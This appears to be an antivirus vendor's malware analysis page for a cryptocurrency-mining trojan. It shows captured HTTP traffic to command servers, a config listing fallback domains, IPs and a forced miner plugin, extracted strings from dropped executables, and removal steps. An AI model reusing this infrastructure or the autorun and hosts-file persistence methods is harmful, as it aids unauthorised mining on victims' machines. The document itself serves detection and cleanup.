GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: throughcountry.net


HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:38 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2741
Keep-Alive: timeout=5, max=123
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://throughcountry.net/?fp=w7y7FqjVPi+35v
ATrhHNATKikXPAGv4JZWtAce2QuVXnKYESjSduVewmbPKxY+l+jYoFAHMhvYKLzNN%
2B02ULvA==&prvtof=GA+/hPGSv9VyeYxpGNTAJ+t383WcnElKtAsNh4/S
3XE=&poru=z8zG8QkJNfFfX7Mwpss/k2tHKSqnfEat5RhDSKRPyPzc5OHfEJBYUN4r
kcqt9WZ9n2j3z8tDVR1hTn8BjlJ8Cn414Wi0FLy6uVrKOjlp6+thgUD32HWOvVsD2y4M
ukR/ah21Yl5XHRM0y6kxBxYOuQ==&cifr=1&method=validate&mode=sox&v=0
28&sox=3b93ce01";.../*..-->..<script type="text/javascript">.
..<!--...dimensionUpdated = 0;...function applyFrameKiller()...{...
.if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.i
nnerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.inne
rHeight;.....dimensionUpdated = 1;.....} else if( document.documentEle
ment && ( document.documentElement.clientWidth || document.documentEle
ment.clientHeight )  ) {.....//IE 6  in 'standards compliant mode'....
.cHeight = document.documentElement.clientHeight;.....dimensionUpdated
 = 1;.....} else if( document.body && ( document.body.clientWidth || d
ocument.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = do
cument.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHei
ght <= 250 && dimensionUpdated == 1).....{......window.top.location
 = "hXXp://throughcountry.net/?fp=w7y7FqjVPi+35vATrhHNATKikXPAGv4JZW
tAce2QuVXnKYESjSduVewmbPKxY+l+jYoFAHMhvYKLzNN+02ULvA==&prvto
f=RZINKQn0zqeuQg1Zvnw5LzJdLdaHRzAxGeAQHwUsVnc=&poru=THlSTGBCi9tQ+B
t5haHsGx6eNyiigepbYiQld2Hh/IxbwX4GyppoiWMJZ25E3QyI71uVyuUy/6%2
<<< skipped >>>


GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net


HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:03 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: ATS/5.0.1
ping.5.FLAG cfg.274."soilunder.net" "longcold.net" "deepsecond.net" "s
toryocean.net" "monthnext.net" "callmile.net" "longlower.net" "faceboa
t.net" "muchhappy.net" "shallgrave.net" "nailthere.net" "fieldthan.net
" "ableread.net" "sellagain.net" "faceloud.net" "fearstate.net" "drive
thirteen.net" var_user_ip.265.Þp_host% = "picturebecome.net";.Þp_p
ath% = "/dep/";.%no_password% = "0";.%timer% = "180";.%ip% = "205.196.
221.133";.%port% = "8079";.%relay_soxid% = "8083";.%thread_timeout% = 
"300";.%newport% = "31442";.%cpuinfo% = "QEMU Virtual CPU version 0.9.
1 (2327 MHz)";.plugin.67369.miner_forced.149.8hGghbvdsfSHvxnjjkJFHDGsf
4.win32plot2.exe 12754694899610736661 3b93ce01 107.155.116.121:1669,23
.92.65.20:9446,107.155.116.121:80,23.92.65.20:80 0 76.MZ..............
........@...............................................!..L.!This pro
gram cannot be run in DOS mode....$..........5S..fS..fS..f...fR..f<
[email protected]<.-f...fZ..fV..fS..f...f<.,ft..f<..fR..fRichS..f......
..........PE..L......T.....................r.......#............@.....
.....................@[email protected].
..<............................ ..D................................
.......@[email protected]..........
................. ..`.rdata..r-..........................@[email protected]....
,[email protected].... ......................@..
B.....................................................................
..................................................................
<<< skipped >>>


GET /IpLocator.htm HTTP/1.0
Accept: */*
Connection: close
Host: VVV.geobytes.com


HTTP/1.0 301 Moved Permanently
Date: Fri, 06 Mar 2015 17:39:04 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.6
Set-Cookie: PHPSESSID=oiihqhdpstgi0amsp89ootkt37; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /IpLocator
Content-Length: 0
Connection: close
Content-Type: text/html







The Malware connects to the servers at the folowing location(s):







ckxjtyt.exe_2836:




.text
`.rdata
@.data
j.hP0L
@-q}#f
SSSh`D@
~2SSShPJ@
SSShP
SSSh`1C
SQSSSh
}GSSSh
SSh`8E
T$$SSSh
SSSh0`F
tsSSSh
~PSSSh
t>SSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ckxjtyt.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
{bUdp
f/%xp
$%f-L
? .OS
#,%cyz
.OVko
.gC?m
:C%f{J
zcÁ
%Documents and Settings%\LocalService
|%System%\pogwoihcz.exe
|decemberknew.net
WATCHDOGPROC "c:\windows\system32\ckxjtyt.exe"
%System%\ckxjtyt.exe
mscoree.dll
KERNEL32.DLL

win32plot2.exe_1396:




.text
`.rdata
@.data
.rsrc
@.reloc
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
kernel32.dll
%srecyclebin\ver1
%srecyclebin\*
%srecyclebin\%s
%srecyclebin\*_*_*_*
%llu_%llu_%u_%u
%c:\recyclebin\%llu_%llu_%u_%u
%srecyclebin\%llu_%llu_%u_%u
%srecyclebin
Adjusting total nonces to %u to match stagger size
System.PercentFull;
Registry key TileInfo changed!
Registry key PreviewDetails changed!
%s\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
win32burst2.exe
%s %s %s %s %s
KERNEL32.dll
RegEnumKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegCloseKey
ADVAPI32.dll
GetProcessHeap
GetCPInfo
zcÁ
%System%\binaries_burst4\win32\win32plot2.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
Bmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL

win32burst2.exe_2548:




.text
`.rdata
@.data
.rsrc
@.reloc
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
ChunkSender[%d]: fuck
ChunkSender[%d]: take a break! %d
[%d] Connected to server.
kernel32.dll
recv = %s
POST /burst?requestType=submitNonce&accountId=%llu&nonce=%llu HTTP/1.0
%c:\recyclebin\*
%c:\recyclebin\%s
Error opening file %s
WSAStartup failed: %d
KERNEL32.dll
WS2_32.dll
GetProcessHeap
GetCPInfo
zcÁ
%System%\binaries_burst4\win32\win32burst2.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
7 7$7(7,7074787
<$=1=<>#?,?
? ?$?(?,?0?
@mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL

jrhwdmjgunjvubg.exe_2660:




.text
`.rdata
@.data
j.hP0L
@-q}#f
SSSh`D@
~2SSShPJ@
SSShP
SSSh`1C
SQSSSh
}GSSSh
SSh`8E
T$$SSSh
SSSh0`F
tsSSSh
~PSSSh
t>SSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ckxjtyt.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
{bUdp
f/%xp
$%f-L
? .OS
#,%cyz
.OVko
.gC?m
:C%f{J
zcÁ
%Documents and Settings%\LocalService
%WinDir%\TEMP\jrhwdmjgunjvubg.exe
mscoree.dll
KERNEL32.DLL

pogwoihcz.exe_3840:




.text
`.rdata
@.data
j.hP0L
@-q}#f
SSSh`D@
~2SSShPJ@
SSShP
SSSh`1C
SQSSSh
}GSSSh
SSh`8E
T$$SSSh
SSSh0`F
tsSSSh
~PSSSh
t>SSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
WS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ckxjtyt.exe
ubg.exe
AutoConnect Engine WebClient Web Procedure Trap
Key BitLocker Connection WMI Computer Shell
pogwoihcz.exe
{bUdp
f/%xp
$%f-L
? .OS
#,%cyz
.OVko
.gC?m
:C%f{J
zcÁ
%Documents and Settings%\LocalService
%System%\pogwoihcz.exe
mscoree.dll
KERNEL32.DLL






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    win32plot2.exe:1396
    jrhwdmjgu925ubg.exe:1776
    jrhwdmjgu925ubg.exe:3876
    jrhwdmjgunjvubg.exe:2660
    %original file name%.exe:1144
    unzip.exe:3760
    ckxjtyt.exe:1964
    ckxjtyt.exe:2836
    jrhwdmjgszdmubgkotiny.exe:2128
    jrhwdmjgt1byubg.exe:2588
    jrhwdmjgubkfubg.exe:3640
    pogwoihcz.exe:3524
    pogwoihcz.exe:2856
    

    2. 

  2. Delete the original Malware file.
    3. 

  3. Delete or disinfect the following files created/modified by the Malware:
    

    %System%\bzntcdorshxs\tst (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (3920 bytes)
    %System%\binaries_burst4\win32\win32plot2.exe (673 bytes)
    %System%\binaries_burst4\win64\win64burst2.exe (673 bytes)
    %System%\binaries_burst4\win32\win32burst2.exe (673 bytes)
    %System%\binaries_burst4\win64\win64plot2.exe (673 bytes)
    %System%\binaries_burst4.zip (10700 bytes)
    %System%\bzntcdorshxs\run (10 bytes)
    %System%\bzntcdorshxs\rng (44 bytes)
    %System%\unzip.exe (7100 bytes)
    %System%\bzntcdorshxs\cfg (494 bytes)
    %System%\pogwoihcz.exe (5873 bytes)
    %WinDir%\Temp\jrhwdmjgu925ubg.exe (35 bytes)
    %WinDir%\Temp\jrhwdmjgt1byubg.exe (35 bytes)
    %WinDir%\Temp\jrhwdmjgubkfubg.exe (2820 bytes)
    %WinDir%\Temp\jrhwdmjgunjvubg.exe (5873 bytes)
    %System%\bzntcdorshxs\etc (10 bytes)
    %System%\ckxjtyt.exe (5873 bytes)
    %System%\drivers\etc\hosts (22 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "AutoConnect Engine WebClient Web Procedure Trap" = "%System%\ckxjtyt.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now